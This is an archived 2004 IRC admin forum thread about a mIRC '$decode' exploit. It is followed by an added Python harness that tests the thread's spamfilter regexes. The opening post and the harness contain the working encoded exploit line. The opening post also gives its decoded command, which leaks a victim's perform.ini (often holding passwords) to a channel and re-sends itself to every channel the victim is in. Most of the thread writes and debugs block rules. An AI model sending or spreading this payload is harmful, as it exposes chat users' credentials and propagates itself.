mIRC $decode exploit

Posted: Mon Jun 21, 2004 3:56 am
by Stealth
The newest form of exploit for mIRC uses $decode.

This exploit is seen as lines that look like this:

Code:

LOL! //echo -a $($decode(JGZpbmRmaWxlKC4sKiwxLHNjaWQgLWF0MSAuYW1zZyBMT0whICQhY2IoMSkgfCAucGxheSAj/SBwZXJmb3JtLmluaSk=,m),2)
Which when echoed, does this:

Code:

//echo -a $findfile(.,*,1,scid -at1 .amsg LOL! $!cb(1) | .play <some channel> perform.ini)
This makes the person's perform.ini file visible to whoever is on the channel it is played to. Since a lot of people use perform for identifying, this makes takeovers and such extremely easy. Along with that, it messages itself to all the channels you are on, on all the servers you are connected to. All the user sees is the first file in his/her mIRC folder that Windows tells it. The rest are done as "silent" commands.

Not too good with regex, but here is a try:

Code:

spamfilter {
	regex ".* //echo -a \$\(\$decode\(.*,m\),[0-9]\);"
	target channel;
	action block;
	reason "$decode exploit";
};

Posted: Mon Jun 21, 2004 2:46 pm
by aquanight
While I would agree with blocking any and all forms of $decode (if you want to send a file like that, use DCC), I think this regex would be good for blocking this specific exploit:

Code:

^LOL! //echo -a \$(\$decode(.+,m),[0-9])$
(?: are the \'s necessary here? I blame .NET for making me think they are :P )

Posted: Mon Jun 21, 2004 6:16 pm
by codemastr
You need the \ for ( and ), but not for $. () are metacharacters for grouping. The $ doesn't need it because the $ only has meaning at the end of a (sub)expression.

Posted: Mon Jun 21, 2004 9:40 pm
by Stealth
I think having .* at the beginning is a good thing though, since it can have anything there to attract attention.

This does not block all of $decode, because of the $( in front of it. The $( tells mIRC to re-evaluate the output of $decode.

I have also noticed that the echo may have either of these switches: a (active window) or s (status window)

From what everyone is saying, this regex should match it well enough:

Code:

//echo -[as] $\($decode\(.+,m\),[0-9]\)

Posted: Tue Jun 22, 2004 1:34 am
by Syzop
I've added the following sig to CVS:

Code:

spamfilter {
        regex "^LOL! //echo -a \$\(\$decode\(.+,m\),[0-9]\)$";
        target channel;
        reason "$decode exploit";
        action block;
};
Without escaping the $'s it didn't work here btw ;p.

noobs net

Posted: Wed Jun 30, 2004 8:53 am
by Gilou
Hi ;)
Actually, the arrival of these bots also let us (admins) see that a lot of noobs were pasting the $decode thing, whatever it might contain, so, may it be paranoia, we decided to block $decode (with a terrible wildcarding), as it's quite useless, and if it does not damage anything, it's quite annoying running after noobs who let stupid $decode things spread ...

I agree, $decode is useless...

Posted: Fri Jul 16, 2004 5:16 pm
by Terantula
... as I have never used it as a user in the years I have been chatting, so I have to agree with Gilou on this, blocking the use of $decode is not a loss, but a fix to a long-existing problem.

I put this spamfilter into my IRCd ASAP.

Code:

spamfilter {
        regex ".*\$decode\.*";
        target channel;
        action block;
        reason "$decode commands are not permitted on this server.";
};

I don't know an apple from regcode, so I hope this works... :)

Posted: Fri Jul 16, 2004 11:03 pm
by aquanight
just $decode by itself is enough...

and you might want to block $encode while you're at it :P

Posted: Mon Jul 19, 2004 8:14 pm
by Guest
Why? $encode can't be used for that type of exploit. It can create them, but it never gets said on the server...

Posted: Mon Jul 19, 2004 11:27 pm
by w00t
Unless it's been escaped.

Posted: Tue Jul 20, 2004 12:10 am
by Jason
Claims Guest Post Above

But that would only be a mistake. And it isn't automatically for creating exploits, so a spamfilter GLINE etc. on it wouldn't be good (I $encode my passwords in my connect script to prevent accidental showing to the person behind me. I certainly wouldn't want to be glined for accidentally missing a / on my //echo $encode(pass))

Posted: Wed Jul 21, 2004 12:55 am
by aquanight
Jason wrote: I certainly wouldn't want to be glined for accidentally missing a / on my //echo $encode(pass))
/echo doesn't even send to the server...

(Off-topic mIRC trick: hit tab after typing an identifier to evaluate it right then and there - only works on the command line (not in the script editor). :) )

Posted: Thu Jul 22, 2004 12:40 am
by Jason
Oops, just trying to make an example! How's this:

//msg $me $encode(pass)

Posted: Thu Jul 22, 2004 4:00 am
by aquanight
Well, /msg NickServ $encode(pass) would be a better example, but I personally use /nickserv :P .

Posted: Thu Jul 22, 2004 4:05 am
by Jason
$decode you mean, when actually sending it, you would want to decode, not encode
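To see which of the spamfilter patterns proposed over this thread actually fire on the posted line, here is an added test harness (not from the thread or from UnrealIRCd) that runs each candidate regex, via Python's re module as a stand-in for the IRCd's regex engine (an assumption; the escaping of $ and parentheses behaves the same for these patterns), against the exploit line as posted plus a few constructed variants and one constructed benign line.

```python
import re

# Candidate spamfilter regexes quoted in the thread, keyed by who proposed them.
PATTERNS = {
    "aquanight (parens unescaped)": r"^LOL! //echo -a \$(\$decode(.+,m),[0-9])$",
    "Syzop (CVS signature)":        r"^LOL! //echo -a \$\(\$decode\(.+,m\),[0-9]\)$",
    "Stealth ($ unescaped)":        r"//echo -[as] $\($decode\(.+,m\),[0-9]\)",
    "Terantula (block all)":        r".*\$decode\.*",
    "aquanight (bare $decode)":     r"\$decode",
}

# Channel text to test: the exploit line exactly as posted in the thread, then
# constructed variants (status-window switch, different bait text) and a
# constructed benign line that merely mentions $decode.
LINES = {
    "exploit_as_posted": "LOL! //echo -a $($decode(JGZpbmRmaWxlKC4sKiwxLHNjaWQgLWF0MSAuYW1zZyBMT0whICQhY2IoMSkgfCAucGxheSAj/SBwZXJmb3JtLmluaSk=,m),2)",
    "variant_status_window": "LOL! //echo -s $($decode(QUJDREVG,m),2)",        # constructed
    "variant_other_bait": "check this //echo -a $($decode(QUJDREVG,m),2)",     # constructed
    "benign_mention": "is $decode still broken in the latest mirc?",           # constructed
}


def matches(pattern: str, line: str) -> bool:
    """True if the pattern fires anywhere in the line (spamfilter-style search)."""
    return re.search(pattern, line) is not None


def evaluate(patterns=PATTERNS, lines=LINES) -> dict:
    """Return {pattern_name: {line_name: matched}} for every combination."""
    return {name: {lname: matches(pat, text) for lname, text in lines.items()}
            for name, pat in patterns.items()}


if __name__ == "__main__":
    # Unescaped ( ) or $ silently turn the signature into a non-matching one;
    # the broad patterns catch every variant but also the benign mention.
    for name, results in evaluate().items():
        hits = ", ".join(l for l, hit in results.items() if hit) or "(nothing)"
        print(f"{name:30} -> {hits}")
```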